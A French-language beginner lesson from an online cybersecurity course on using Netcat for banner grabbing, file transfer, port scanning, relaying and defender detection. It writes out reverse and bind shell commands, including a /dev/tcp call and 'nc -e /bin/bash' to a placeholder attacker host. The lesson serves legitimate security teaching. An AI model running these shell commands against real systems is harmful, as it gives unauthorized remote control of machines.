Netcat : la boîte à outils polyvalente
Utilisez nc pour les bannières, le transfert de fichiers, la redirection de ports et les shells inversés simples.
Netcat : la boîte à outils polyvalente est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu’est-ce que Netcat ?
Netcat (nc) est un utilitaire qui lit et écrit des données sur des connexions réseau TCP ou UDP. Il est installé sur presque tous les systèmes Unix et s’avère précieux pour le débogage, le transfert de fichiers et l’exploitation élémentaire.
Connexion élémentaire et récupération de bannière
Connectez-vous à n’importe quel port TCP pour récupérer la bannière du service et interagir manuellement avec le protocole. C’est la forme la plus simple de reconnaissance.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPÉcoute sur un port
Netcat peut écouter les connexions entrantes avec -l -p. Cette fonction est utile pour vérifier la connectivité, intercepter des interpréteurs de commandes inverses et recevoir des fichiers.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberTransfert de fichiers avec Netcat
Netcat peut envoyer des fichiers en les redirigeant vers une connexion. Le récepteur écoute et redirige la sortie vers un fichier. Il n’y a aucun chiffrement : utilisez cette méthode uniquement sur des réseaux de confiance.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtAnalyse des ports avec Netcat
Netcat peut effectuer une analyse élémentaire des ports avec -z (mode sans entrées-sorties) et -w (délai d’attente). Il est plus lent que Nmap, mais utile lorsque Nmap n’est pas disponible.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Interpréteur de commandes inverse simple
Un interpréteur de commandes inverse fait en sorte que la cible se connecte à l’attaquant. Il est utile lors d’essais d’intrusion lorsque les règles du pare-feu bloquent les connexions entrantes vers la cible.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashInterpréteur de commandes lié
Un interpréteur de commandes lié écoute sur la machine cible. L’attaquant s’y connecte. Cette méthode est moins courante dans les essais d’intrusion modernes, car les pare-feu bloquent généralement les connexions entrantes.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Mode UDP
Utilisez -u pour les connexions UDP. Cette option est utile pour vérifier des services UDP comme DNS (port 53) et SNMP (port 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Relais avec Netcat
Netcat peut enchaîner des connexions afin de servir de relais entre des réseaux. Associé à des tubes nommés (mkfifo), il crée des tunnels bidirectionnels simples sans outils supplémentaires.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat : l’alternative moderne
Ncat (qui fait partie de Nmap) étend Netcat avec la prise en charge de SSL (--ssl), le contrôle d’accès et le mode courtier. Préférez Ncat pour les canaux chiffrés.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Défenseurs : détecter Netcat
Les connexions Netcat ressemblent à des connexions TCP normales. Les défenseurs le détectent en surveillant les noms de processus (HIDS), les ports sortants inhabituels et les interpréteurs de commandes lancés par des processus parents inattendus.
Vérification rapide
Quel indicateur de Netcat active le mode écoute ?
Résumé : Netcat
Netcat est un outil fondamental : utilisez-le pour récupérer des bannières, transférer des fichiers, vérifier la connectivité et comprendre le fonctionnement des interpréteurs de commandes inverses ou liés. Lors d’essais d’intrusion autorisés, il permet de vérifier les règles du pare-feu et de simuler le déplacement de l’attaquant entre les réseaux. Maîtrisez-le, à la fois pour l’utiliser et pour le détecter.
Questions Fréquemment Posées
La leçon « Netcat : la boîte à outils polyvalente » est-elle gratuite ?
Oui — le texte complet de « Netcat : la boîte à outils polyvalente » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Netcat : la boîte à outils polyvalente » ?
Utilisez nc pour les bannières, le transfert de fichiers, la redirection de ports et les shells inversés simples. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Netcat : la boîte à outils polyvalente » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Techniques d’analyse des ports avec Nmap
- Empreinte des services et des systèmes d’exploitation
- Netcat : la boîte à outils polyvalente
- Scripting pour l’énumération réseau